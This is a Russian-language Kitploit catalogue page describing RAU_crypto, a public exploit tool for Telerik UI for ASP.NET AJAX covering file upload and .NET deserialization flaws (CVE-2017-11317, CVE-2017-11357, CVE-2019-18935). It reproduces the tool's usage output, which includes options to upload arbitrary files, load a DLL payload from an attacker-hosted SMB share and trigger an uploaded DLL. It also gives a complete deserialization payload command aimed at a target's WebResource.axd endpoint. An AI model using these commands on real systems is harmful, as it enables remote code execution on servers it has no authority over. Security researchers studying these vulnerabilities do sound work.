Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RAU_crypto — Эксплойт загрузки файлов и десериализации .NET для Telerik UI for ASP.NET AJAX (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935) | Kitploit
Инструменты/GitHubGitHub/bao7uo/rau_crypto
Инструменты шифрования/дешифрованияГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubbao7uo/rau_crypto

RAU_crypto

Эксплойт загрузки файлов и десериализации .NET для Telerik UI for ASP.NET AJAX (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

Репозиторий
180506 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RAU_crypto

Language

Комбинированный эксплойт для Telerik UI for ASP.NET AJAX.

  • Загрузка файлов для CVE-2017-11317 и CVE-2017-11357 — автоматически загружает файл
  • Десериализация .NET для CVE-2019-18935

Теперь поддерживает проверку способности цели загружать удаленные полезные нагрузки из SMB-сервиса, размещенного атакующим. Используйте Burp Collaborator и/или Responder для проверки наличия необходимых предварительных условий.

Для успешной эксплуатации обычно требуется версия с жестко закодированными ключами, или необходимо знать ключ, например, если вы можете раскрыть содержимое web.config. Эксплойт также позволяет легко расшифровывать и шифровать rauPostData, используемые с Telerik.Web.UI.WebResource.axd?type=rau

Требования

  • python >= 3.6 с pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) — устанавливается с помощью pip3 install pycryptodome или pip3 install pycryptodomex

Опубликовано на exploit-db (старая версия)

  • https://www.exploit-db.com/exploits/43874/

Смотрите также

Мой другой эксплойт для Telerik UI (CVE-2017-9248), вероятно, также будет интересен. Он доступен здесь:

  • https://github.com/bao7uo/dp_crypto

Список задач

  • Отсутствующая функциональность HMAC для более поздних версий.
  • Возможность указать пользовательский ключ.
  • Аргумент командной строки для выполнения mixed mode dll (тем временем используйте пример полезной нагрузки для десериализации .NET, приведенный ниже).
  • Аргументы командной строки для проверки возможности загрузки и загрузки удаленных (SMB) mixed mode dll.
  • Отдельная утилита для тестирования mixed mode dll.
  • Предоставить исходный код/инструкции по компиляции для mixed mode dll.
  • Перебор версий.

Примечание — последние четыре пункта выполнены, но не опубликованы.

Уязвимости

Уязвимость загрузки файлов (CVE-2017-11317) была обнаружена другими, я считаю, что кредиты принадлежат @straight_blast @pwntester @olekmirosh. Вскоре после объявления я столкнулся с библиотекой Telerik в ходе своей работы, поэтому я изучил ее и уязвимость и написал этот эксплойт в июле 2017 года. Я также сообщил о CVE-2017-11357, связанном с небезопасной прямой ссылкой на объект.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

Уязвимость десериализации .NET (CVE-2019-18935) была обнаружена @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Использование

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

Пример — расшифровка

Decrypt screenshot

Пример — произвольная загрузка файла

Upload screenshot

Пользовательская полезная нагрузка (десериализация .NET)

Подробнее о пользовательских полезных нагрузках для десериализации .NET можно узнать из отличной статьи @mwulftange, обнаружившего эту уязвимость, в блоге Code White по следующей ссылке.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

Обновление — есть альтернативный эксплойт от Caleb Gross @noperator, который включает функции этого эксплойта, с отличной статьей в блоге, объясняющей все. Спасибо также Caleb за вклад в RAU_Crypto.

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

Другие соответствующие ссылки.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

Пример полезной нагрузки для десериализации .NET:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

Для mixed mode DLL смотрите мой другой репозиторий GitHub:

  • https://github.com/bao7uo/MixedUp

Особая благодарность @irsdl, который вдохновил на создание функции пользовательской полезной нагрузки.

Благодарность @rwincey, который вдохновил на создание функции удаленной DLL.

Скачать инструмент